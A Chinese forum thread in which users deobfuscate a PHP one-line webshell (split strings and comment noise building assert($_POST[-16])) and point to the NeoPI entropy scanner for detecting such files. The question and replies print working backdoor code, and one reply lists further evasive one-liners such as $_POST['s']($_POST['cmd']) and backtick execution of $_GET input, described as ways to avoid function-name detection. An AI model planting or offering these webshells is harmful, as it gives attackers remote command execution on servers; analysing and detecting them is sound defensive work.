一個有意思的 PHP 一句話後門，怎麼破？

看到一個有意思的php一句話：

                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/11/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

回複內容：

assert($_POST[-16]);
?>我覺得題主應該是問的密碼是多少吧，這個一句話後面注釋全部去掉之後，POST數組的key其實是一個算術運算

0-11-5

這一點也談不上新奇，也談不上是我見過的最變態的PHP後門。

如果有伺服器許可權，可以掃描檔案的話（作為管理員沒道理不行吧？），這類後門會被一類使用統計方法（計算包括資訊熵、Index of Coincidence 在內的一系列統計指標）的偵查工具直接幹爆。給一個很簡單的例子：Neohapsis/NeoPI · GitHub

使用這個Python指令碼檢查這個檔案：

[[ Average IC for Search ]]0.139386719155[[ Top 10 lowest IC files ]]  0.1394        ./test/test.php[[ Top 10 entropic files for a given search ]]  3.5443        ./test/test.php[[ Top 10 longest word files ]]      60        ./test/test.php[[ Top 10 signature match counts ]]       0        ./test/test.php[[ Top 10 SUPER-signature match counts (These are usually bad!) ]]       0        ./test/test.php[[ Top cumulative ranked files ]]       5        ./test/test.php

/*-/*-*/ 注釋 ：）

作為一個看了一年後門的人，已經能分清一句話是公是母了，這種馬確實不太奇怪,
我覺得比較有意思的一句話後門有
echo `$_GET['id']` //插在檔案中比較難發現
?>

 ($_=$I.$_GET[3]).$_($I.$_POST[4])?> 據說PKAV大牛最近寫了個產生這種後門的網頁 $_POST['s']($_POST['cmd']);//躲避函數名查殺?>還有用inlude調用圖片的馬

僅僅是字元拆分，躲避關鍵函數名查殺。

